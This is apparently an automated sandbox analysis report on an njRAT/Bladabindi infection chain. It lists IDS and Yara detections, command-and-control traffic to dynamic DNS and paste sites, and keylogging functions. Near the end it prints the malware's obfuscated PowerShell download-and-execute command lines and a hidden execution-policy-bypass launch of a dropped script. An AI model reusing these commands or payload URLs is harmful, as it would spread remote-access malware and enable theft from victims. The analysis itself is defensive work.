Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:56145 -> 46.246.14.5:2054
Source: Network traffic	Suricata IDS: 2825565 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity Sending Screenshot (CAP) : 192.168.2.5:56145 -> 46.246.14.5:2054
Source: Network traffic	Suricata IDS: 2825566 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (CAP) : 192.168.2.5:56145 -> 46.246.14.5:2054

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 191.252.83.213 ports 1,2,60326,60973,60340,21

Uses dynamic DNS services

Source: unknown

DNS query: name: notificadoresrma.duckdns.org

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.powershell.exe.1d3930c6538.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.1d3944eae80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.powershell.exe.2078fd80b60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.powershell.exe.2078fd84ec0.0.raw.unpack, type: UNPACKEDPE

Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 191.252.83.213:60973
Source: global traffic	TCP traffic: 192.168.2.5:56145 -> 46.246.14.5:2054

Source: global traffic	HTTP traffic detected: GET /pastes/01922156-0a1a-798a-ba18-d0ce12473978/raw HTTP/1.1Host: pastecodeapp.vercel.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pastes/019220a5-2811-7ab8-829c-a7f4350452e0/raw HTTP/1.1Host: pastecodeapp.vercel.app
Source: global traffic	HTTP traffic detected: GET /pastes/019220a3-9326-7b46-b740-ef110ecdb453/raw HTTP/1.1Host: pastecodeapp.vercel.app
Source: global traffic	HTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View	IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View	IP Address: 191.252.83.213 191.252.83.213
Source: Joe Sandbox View	IP Address: 76.76.21.22 76.76.21.22
Source: Joe Sandbox View	IP Address: 76.76.21.22 76.76.21.22

Source: Joe Sandbox View	ASN Name: PORTLANEwwwportlanecomSE PORTLANEwwwportlanecomSE
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: LocawebServicosdeInternetSABR LocawebServicosdeInternetSABR

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 76.76.21.22:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 76.76.21.22:443

Source: unknown

FTP traffic detected: 191.252.83.213:21 -> 192.168.2.5:49704 220 "Servico de FTP da Locaweb"

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /pastes/01922156-0a1a-798a-ba18-d0ce12473978/raw HTTP/1.1Host: pastecodeapp.vercel.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pastes/019220a5-2811-7ab8-829c-a7f4350452e0/raw HTTP/1.1Host: pastecodeapp.vercel.app
Source: global traffic	HTTP traffic detected: GET /pastes/019220a3-9326-7b46-b740-ef110ecdb453/raw HTTP/1.1Host: pastecodeapp.vercel.app
Source: global traffic	HTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ftp.desckvbrat.com.br
Source: global traffic	DNS traffic detected: DNS query: pastecodeapp.vercel.app
Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: notificadoresrma.duckdns.org

Source: powershell.exe, 00000005.00000002.2847112726.00000256B7F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mdHy
Source: powershell.exe, 00000002.00000002.3002434212.000001E2ED8B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2444391639.0000020A42535000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2262307910.0000020A28534000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2353901429.000002078DA85000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2420905012.0000020956705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000004.00000002.2236815480.000001D394365000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://desckvbrat.com.br
Source: powershell.exe, 00000004.00000002.2236815480.000001D39475B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://firebasestorage.googleapis.com
Source: powershell.exe, 00000004.00000002.2236815480.000001D394365000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.desckvbrat.com.br
Source: powershell.exe, 00000004.00000002.2236815480.000001D3947B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2856145468.000001D3A2CD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2724257529.00000256AFA70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2661344132.000001F552490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65B7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F573ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.2263158349.0000020A2A9C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078FF6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.0000020959130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000004.00000002.2236815480.000001D3943BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastecodeapp.vercel.app
Source: powershell.exe, 00000008.00000002.2178810552.0000020F55D32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2200486936.000002569FC22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542643000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2935786151.000001E2D57DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D392C78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2200486936.000002569FA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F55B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A15D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078F73A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.00000209588A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2200486936.000002569FC22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542643000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.2178810552.0000020F56FCF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.2178810552.0000020F55D32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2838267967.00000256B7D72000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2444391639.0000020A42535000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.2935786151.000001E2D5798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000002.00000002.2935786151.000001E2D57AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D392C78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2200486936.000002569FA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F55B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A15D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A14F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078F6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078F6E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.00000209588AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.00000209588BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2231129642.000001D3911C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=
Source: powershell.exe, 00000004.00000002.2236815480.000001D39475B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D3931F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com
Source: powershell.exe, 00000004.00000002.2236815480.000001D39475B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D3931F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/descargas-dc4d6.appspot.com/o/envios-nuevos.txt?alt=medi
Source: powershell.exe, 00000004.00000002.2236815480.000001D39475B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firebasestorage.googleh
Source: powershell.exe, 00000008.00000002.2178810552.0000020F55D32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2236815480.000001D393C6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2856145468.000001D3A2CD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2724257529.00000256AFA70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2661344132.000001F552490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65B7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F573ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.2178810552.0000020F56FCF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.2178810552.0000020F56FCF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A9C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.000002095912A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.0000020958FB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.0000020958FB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/pQQ0n3eA
Source: powershell.exe, 00000004.00000002.2236815480.000001D3946E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastecodeapp.vX
Source: powershell.exe, 00000004.00000002.2236815480.000001D39438F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastecodeapp.vXB
Source: powershell.exe, 00000004.00000002.2236815480.000001D392E83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39323F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39438F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastecodeapp.vercel.app
Source: powershell.exe, 00000004.00000002.2236815480.000001D39323F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39322F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/raw
Source: powershell.exe, 00000004.00000002.2236815480.000001D39323F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/rawP
Source: powershell.exe, 00000004.00000002.2236815480.000001D3946E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D3946D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39306F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39440D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/raw
Source: powershell.exe, 00000004.00000002.2236815480.000001D3946E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/rawP
Source: powershell.exe, 00000004.00000002.2236815480.000001D39438F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/raw
Source: powershell.exe, 00000004.00000002.2236815480.000001D39438F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/rawP

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 56147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56147
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56146
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 76.76.21.22:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:56146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:56147 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, Keylogger.cs	.Net Code: VKCodeToUnicode
Source: 18.2.powershell.exe.2078fd84ec0.0.raw.unpack, Keylogger.cs	.Net Code: VKCodeToUnicode
Source: 23.2.powershell.exe.20958f44b38.1.raw.unpack, Keylogger.cs	.Net Code: VKCodeToUnicode

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00D25F1F GetKeyState,GetKeyState,GetKeyState,		15_2_00D25F1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00D25F30 GetKeyState,GetKeyState,GetKeyState,		15_2_00D25F30

E-Banking Fraud

Yara detected Njrat

Source: Yara match	File source: 23.2.powershell.exe.20958f44b38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.powershell.exe.20958f44b38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.20a2a7dbe00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.powershell.exe.2078fd84ec0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.powershell.exe.20958f407d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.powershell.exe.2078fd80b60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.powershell.exe.2078fd84ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2442574542.0000020959177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2263158349.0000020A2AA0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2358188672.000002078FFB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2442574542.0000020958E27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2386362117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 2748, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1088, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5792, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8287
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2064
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8287	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2064	Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???Qw
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM